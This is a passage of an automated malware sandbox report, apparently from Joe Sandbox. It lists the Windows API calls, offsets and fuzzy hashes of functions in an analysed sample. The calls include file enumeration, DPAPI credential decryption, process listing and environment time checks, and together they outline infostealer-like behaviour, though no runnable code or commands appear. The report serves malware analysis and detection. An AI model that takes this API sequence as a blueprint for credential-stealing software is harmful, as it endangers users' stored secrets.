                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00150D73), ref: 0013E4A2
                  • StrCmpCA.SHLWAPI(?,001514F8), ref: 0013E4F2
                  • StrCmpCA.SHLWAPI(?,001514FC), ref: 0013E508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0013EBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: 027f4cd9ff394134a2cd4d7ef35d34b10a120377abd63c1527606b6d1c525ac3
                  • Instruction ID: cc85c2c79e37e4d896b106ea72ff140988f8f9c485f1f640651308a26a7dc47b
                  • Opcode Fuzzy Hash: 027f4cd9ff394134a2cd4d7ef35d34b10a120377abd63c1527606b6d1c525ac3
                  • Instruction Fuzzy Hash: 9312AA71990118ABEB15FB70DC96EED7338AF64305FC245A8B50A960A1EF305F49CF92
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0013C871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0013C87C
                  • lstrcat.KERNEL32(?,00150B46), ref: 0013C943
                  • lstrcat.KERNEL32(?,00150B47), ref: 0013C957
                  • lstrcat.KERNEL32(?,00150B4E), ref: 0013C978
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: e58604d1fd8d519bc68302d5aa22c1e2f6504d7208df95a88d4f0b2e66414b7b
                  • Instruction ID: be562897d5c54c16543bf3a1f757c0c03562e50b463ff889ed826c74c9446fad
                  • Opcode Fuzzy Hash: e58604d1fd8d519bc68302d5aa22c1e2f6504d7208df95a88d4f0b2e66414b7b
                  • Instruction Fuzzy Hash: 2341407590421ADFDB20DFA4DD89BFEF7B8BB88705F1041A8E509B6280D7745A84CF91
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 0014696C
                  • sscanf.NTDLL ref: 00146999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001469B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001469C0
                  • ExitProcess.KERNEL32 ref: 001469DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: cf0e404767628319db80626502030293b0c43f804bb64d6157d6f8f0b37d4a81
                  • Instruction ID: 767785d0e1eda14b98a61edf273378b26ccda1064a22e968ad67301af1179cc1
                  • Opcode Fuzzy Hash: cf0e404767628319db80626502030293b0c43f804bb64d6157d6f8f0b37d4a81
                  • Instruction Fuzzy Hash: FB21EAB5D04209ABCF04EFE4D9459EEB7B9BF48304F04852AE41AA3250EB345605CBA6
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0013724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00137254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00137281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001372A4
                  • LocalFree.KERNEL32(?), ref: 001372AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 874bdbe60964e74f24fabe06fc09ca9748c42ed17067540106152a1dc5c8a91e
                  • Instruction ID: 80c2cfd40707ac921a03ff836e57cbd9d89d2b775259a5b6f81ceee44fbcf8da
                  • Opcode Fuzzy Hash: 874bdbe60964e74f24fabe06fc09ca9748c42ed17067540106152a1dc5c8a91e
                  • Instruction Fuzzy Hash: D00112B5A40208BBDB24DFD4CD46F9E77B8EB44701F104154FB09BB2C0D770AA408B66
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0014961E
                  • Process32First.KERNEL32(00150ACA,00000128), ref: 00149632
                  • Process32Next.KERNEL32(00150ACA,00000128), ref: 00149647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0014965C
                  • CloseHandle.KERNEL32(00150ACA), ref: 0014967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: f470f600a42445506356a78deaa1162d831648480a234a795ce079f9d5013144
                  • Instruction ID: 07b37e88cfbdde308f38bad80bc86e0f114e6550a91b7eff0b30698465b1e7f9
                  • Opcode Fuzzy Hash: f470f600a42445506356a78deaa1162d831648480a234a795ce079f9d5013144
                  • Instruction Fuzzy Hash: 51011EB5A00208EBCB25DFA5CD48BEEBBF8EB48301F104188A90997250E7349B80DF51
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: )_yt$]'h>${0x$|-~~
                  • API String ID: 0-2904451045
                  • Opcode ID: 2524993758ab51ebc0ea284ba2173aaee18a74004f825c1cb5c2270dc8102bcf
                  • Instruction ID: 6f218af74a26bc119c8785b80f6f8a11085c961c468ae867fa922150e7545e1b
                  • Opcode Fuzzy Hash: 2524993758ab51ebc0ea284ba2173aaee18a74004f825c1cb5c2270dc8102bcf
                  • Instruction Fuzzy Hash: 25B23CF360C6009FE304AE2DEC8567ABBD9EFD4720F1A863DE6C4C7744E93598058696
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00135184,40000001,00000000,00000000,?,00135184), ref: 00148EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 2c983453dd68b9ca37f3978dc421653fef1ccf094ab8be637625d6d6b0fd35e0
                  • Instruction ID: 9ae73ad2a44a95f60beefecdddcf0db4e93fb0b1b038b687985484d48a8c959f
                  • Opcode Fuzzy Hash: 2c983453dd68b9ca37f3978dc421653fef1ccf094ab8be637625d6d6b0fd35e0
                  • Instruction Fuzzy Hash: B9111574200209BFDB04CF64E884FAF37AAAF89704F109448F9198B260DB76EC85DB61
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00134EEE,00000000,00000000), ref: 00139AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00134EEE,00000000,?), ref: 00139B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00134EEE,00000000,00000000), ref: 00139B2A
                  • LocalFree.KERNEL32(?,?,?,?,00134EEE,00000000,?), ref: 00139B3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: 09f5f9565fdc553a2d9df76d7ad465405708e9ec1c150015525e7415c133f356
                  • Instruction ID: ca07a5014826e098ac620af55ef143153149f8f0513cb20927bccc1788c57cd6
                  • Opcode Fuzzy Hash: 09f5f9565fdc553a2d9df76d7ad465405708e9ec1c150015525e7415c133f356
                  • Instruction Fuzzy Hash: F511A4B4240208FFEB11CF64DC95FAAB7B9FB89700F208058F9199B394C7B5A941CB51
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0102DCC8,00000000,?,00150E10,00000000,?,00000000,00000000), ref: 00147A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00147A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0102DCC8,00000000,?,00150E10,00000000,?,00000000,00000000,?), ref: 00147A7D
                  • wsprintfA.USER32 ref: 00147AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: 9e4db54a4da47cb4f7e5ff967a33c80a51195a508483beb627b66c6d281b2ba7
                  • Instruction ID: e62935ed9ebf3c28fe2aace8d0a697b9d6f5be5f408f1c394e113f9ce2862eab
                  • Opcode Fuzzy Hash: 9e4db54a4da47cb4f7e5ff967a33c80a51195a508483beb627b66c6d281b2ba7
                  • Instruction Fuzzy Hash: B7118EB1A45618EBEB208B54DC49FA9BBB8FB44721F10479AE91A932D0C7741A80CF52
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: +i$7!F$o$r^
                  • API String ID: 0-1303766068
                  • Opcode ID: 228a48fa471ec250279deeea61258b324492e08e7437eb333ef7c3e105219ffb
                  • Instruction ID: 5625795f4b0957e5429097a7c36302beab9f8acb5b5bfd110c5beeb1aed79013
                  • Opcode Fuzzy Hash: 228a48fa471ec250279deeea61258b324492e08e7437eb333ef7c3e105219ffb
                  • Instruction Fuzzy Hash: 2AB21AF3A0C2049FE304AE2DDC8567AB7E5EF94720F1A893DE6C5C3744EA3598058697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: A;n$1)og$X5~;
                  • API String ID: 0-2445990043
                  • Opcode ID: 5866169a08fd074e6d0f920c5df5bb8da28c5ec83252ae367b2efdf6ae3d8a33
                  • Instruction ID: c73afe2300bbb010d2a25d7a00eba8b136312ac352d591e010073c426ef89c95
                  • Opcode Fuzzy Hash: 5866169a08fd074e6d0f920c5df5bb8da28c5ec83252ae367b2efdf6ae3d8a33
                  • Instruction Fuzzy Hash: FAB208F35082049FE704AE2DEC8567AFBE9EF94720F16893DEAC4C7744EA3558048796
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Dj/~$HU[$Q)[
                  • API String ID: 0-3589919254
                  • Opcode ID: eb72abbdad8ce6ff5b74ecfadd0166488a1cf7375b8f1382d3b71e205d6a58a8
                  • Instruction ID: e827467afa84100df2adc28aa8521f22e4cdd19f6e540b10081901e820d2d5b8
                  • Opcode Fuzzy Hash: eb72abbdad8ce6ff5b74ecfadd0166488a1cf7375b8f1382d3b71e205d6a58a8
                  • Instruction Fuzzy Hash: 9BB216F3908214AFE3046E29EC8567AFBE5EF94760F1A493DEAC4C7744EA3558018787
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: &*/]$LL$p&{x
                  • API String ID: 0-2891148233
                  • Opcode ID: c5059ae61080932c2ee3afaf2f1036de05e16ff7192519ae15fdd3608d671359
                  • Instruction ID: 0b78bb1f01e3b7f128164c947f29433b94ebb0ea7b21de06788e4ad2093072fb
                  • Opcode Fuzzy Hash: c5059ae61080932c2ee3afaf2f1036de05e16ff7192519ae15fdd3608d671359
                  • Instruction Fuzzy Hash: C892F4F360C2049FE304AE2DEC8567AFBE5EF94720F1A893DE6C487744EA3558148697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: J#ko$_gy$s5zY
                  • API String ID: 0-2839027486
                  • Opcode ID: 21dd234971fd1884a0673c92ee037c0d39e9319795d7afc0c6eb95e4f3cdddb0
                  • Instruction ID: f67e3f0ec3ba09fd1e944d9c327a4e6bc5ee88ed46466a156a69748e2e4df455
                  • Opcode Fuzzy Hash: 21dd234971fd1884a0673c92ee037c0d39e9319795d7afc0c6eb95e4f3cdddb0
                  • Instruction Fuzzy Hash: 4D8209F3A082109FE304AE2DEC8576AFBE5EFD4720F1A853DEAC4C7744E53598058696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Ro|$t>X$t>X
                  • API String ID: 0-2328115121
                  • Opcode ID: 3431ca54d3c10f186f705cbd2af15293ac51e66b9ca96d85755a7c901874f8e7
                  • Instruction ID: 73d4cb15fa8c14beea750ee5d2bbdc979ed3c8a1af4e71fde32cb6f348990d10
                  • Opcode Fuzzy Hash: 3431ca54d3c10f186f705cbd2af15293ac51e66b9ca96d85755a7c901874f8e7
                  • Instruction Fuzzy Hash: 0882E5F360C2009FE308AF69DC8567ABBE5EF94720F1A492DE6C5C3744EA3598418797
                  APIs
                  • CoCreateInstance.COMBASE(0014E118,00000000,00000001,0014E108,00000000), ref: 00143758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001437B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: ca51070564081c1a1e81eb335e940d996e1eded94651f6c5cde4d39b8e9f8aa7
                  • Instruction ID: 6c8196a629642502258e9ba181180ff7563fd674e039065efd7af3ba0706cdb4
                  • Opcode Fuzzy Hash: ca51070564081c1a1e81eb335e940d996e1eded94651f6c5cde4d39b8e9f8aa7
                  • Instruction Fuzzy Hash: 1941E970A40A289FDB24DB58CC95B9BB7B5BB48702F5042D8E618E72E0D771AEC5CF50
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00139B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00139BA3
                  • LocalFree.KERNEL32(?), ref: 00139BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: 121068b82d1a7d7ff80d21155a24afa0ceef0a198892063d347e31446d5cbaaf
                  • Instruction ID: c2b7ee29f8d015e938abbdb8dc7e807aeb9c318624daf0229b728671132cc5fc
                  • Opcode Fuzzy Hash: 121068b82d1a7d7ff80d21155a24afa0ceef0a198892063d347e31446d5cbaaf
                  • Instruction Fuzzy Hash: 0C1109B8A00209EFCB05DF94D985EAEB7B9FF88300F104598E915A7394D770AE50CFA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Pqo${W^T
                  • API String ID: 0-4049201387
                  • Opcode ID: a4b0f3c16eb10d95f0ae965297912e50b53869b533e6b753f6775db82d6b90eb
                  • Instruction ID: 683cc6d3e3c39336f60eb32372bd34bd1e13a64fb83717d50fe7c068e5c705a2
                  • Opcode Fuzzy Hash: a4b0f3c16eb10d95f0ae965297912e50b53869b533e6b753f6775db82d6b90eb
                  • Instruction Fuzzy Hash: A15216F350C2009FD308AF29EC8567AFBE5EF94760F1A492DEAC587344EA3598058787
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
